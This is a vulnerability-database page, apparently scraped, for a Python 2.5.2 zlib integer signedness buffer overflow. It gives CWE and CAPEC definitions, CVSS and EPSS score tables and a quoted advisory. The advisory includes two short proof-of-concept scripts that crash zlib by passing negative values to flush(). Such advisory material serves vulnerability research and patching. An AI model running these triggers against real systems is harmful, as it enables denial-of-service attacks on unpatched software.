CPE, which stands for Common Platform Enumeration, is a standardized scheme for naming hardware, software, and operating systems. CPE provides a structured naming scheme to uniquely identify and classify information technology systems, platforms, and packages based on certain attributes such as vendor, product name, version, update, edition, and language.
CWE, or Common Weakness Enumeration, is a comprehensive list and categorization of software weaknesses and vulnerabilities. It serves as a common language for describing software security weaknesses in architecture, design, code, or implementation that can lead to vulnerabilities.
CAPEC, which stands for Common Attack Pattern Enumeration and Classification, is a comprehensive, publicly available resource that documents common patterns of attack employed by adversaries in cyber attacks. This knowledge base aims to understand and articulate common vulnerabilities and the methods attackers use to exploit them.
Services & Price
Help & Info
Search : CVE id, CWE id, CAPEC id, vendor or keywords in CVE
Integer signedness error in the zlib extension module in Python 2.5.2 and earlier allows remote attackers to execute arbitrary code via a negative signed integer, which triggers insufficient memory allocation and a buffer overflow.
Incorrect Conversion between Numeric Types When converting from one data type to another, such as long to integer, data can be omitted or translated in a way that produces unexpected values. If the resulting values are used in a sensitive context, then dangerous behaviors may occur.
Metrics
Metrics
Score
Severity
CVSS Vector
Source
V2
7.5
AV:N/AC:L/Au:N/C:P/I:P/A:P
nvd@nist.gov
EPSS
EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.
EPSS Score
The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.
Date
EPSS V0
EPSS V1
EPSS V2 (> 2022-02-04)
EPSS V3 (> 2025-03-07)
EPSS V4 (> 2025-03-17)
2022-02-06
–
–
47.94%
–
–
2022-07-17
–
–
47.94%
–
–
2022-07-24
–
–
47.94%
–
–
2022-10-02
–
–
47.94%
–
–
2023-03-12
–
–
–
10.08%
–
2024-02-11
–
–
–
10.08%
–
2024-06-02
–
–
–
10.08%
–
2024-12-08
–
–
–
9.88%
–
2024-12-22
–
–
–
33.63%
–
2025-01-05
–
–
–
34.35%
–
2025-01-19
–
–
–
34.35%
–
2025-03-18
–
–
–
–
23.43%
2025-03-30
–
–
–
–
23.43%
2025-04-06
–
–
–
–
23.43%
2025-04-06
–
–
–
–
23.43,%
EPSS Percentile
The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.
source: https://www.securityfocus.com/bid/28715/info
Python zlib module is prone to a remote buffer-overflow vulnerability because the library fails to properly sanitize user-supplied data.
An attacker can exploit this issue to execute arbitrary code with the privileges of the user running an application that relies on the affected library. Failed exploit attempts will result in a denial-of-service condition.
This issue affects Python 2.5.2; other versions may also be vulnerable.
python-2.5.2-zlib-unflush-misallocation.py
------------------------------------------
#!/usr/bin/python
import zlib
msg = """
Desire to know why, and how, curiosity; such as is in no living creature
but man:
so that man is distinguished, not only by his reason, but also by this
singular passion
from other animals; in whom the appetite of food, and other pleasures of
sense, by
predominance, take away the care of knowing causes; which is a lust of
the mind,
that by a perseverance of delight in the continual and indefatigable
generation of knowledge, exceedeth the short vehemence of any carnal
pleasure.
"""
compMsg = zlib.compress(msg)
bad = -24
decompObj = zlib.decompressobj()
decompObj.decompress(compMsg)
decompObj.flush(bad)
python-2.5.2-zlib-unflush-signedness.py:
----------------------------------------
#!/usr/bin/python
import zlib
msg = """
Society in every state is a blessing, but government even in its best
state is but a necessary evil
in its worst state an intolerable one; for when we suffer, or are
exposed to the same miseries by a
government, which we might expect in a country without government, our
calamities is heightened by
reflecting that we furnish the means by which we suffer! Government,
like dress, is the badge of
lost innocence; the palaces of kings are built on the ruins of the
bowers of paradise. For were
the impulses of conscience clear, uniform, and irresistibly obeyed, man
would need no other
lawgiver; but that not being the case, he finds it necessary to
surrender up a part of his property
to furnish means for the protection of the rest; and this he is induced
to do by the same prudence which
in every other case advises him out of two evils to choose the least.
Wherefore, security being the true
design and end of government, it unanswerably follows that whatever form
thereof appears most likely to
ensure it to us, with the least expense and greatest benefit, is
preferable to all others.
""" * 1024
compMsg = zlib.compress(msg)
bad = -2
decompObj = zlib.decompressobj()
decompObj.decompress(compMsg, 1)
decompObj.flush(bad)
Products Mentioned
Configuraton 0
Python>>Python >> Version From (including) 2.4.0 To (excluding) 2.4.6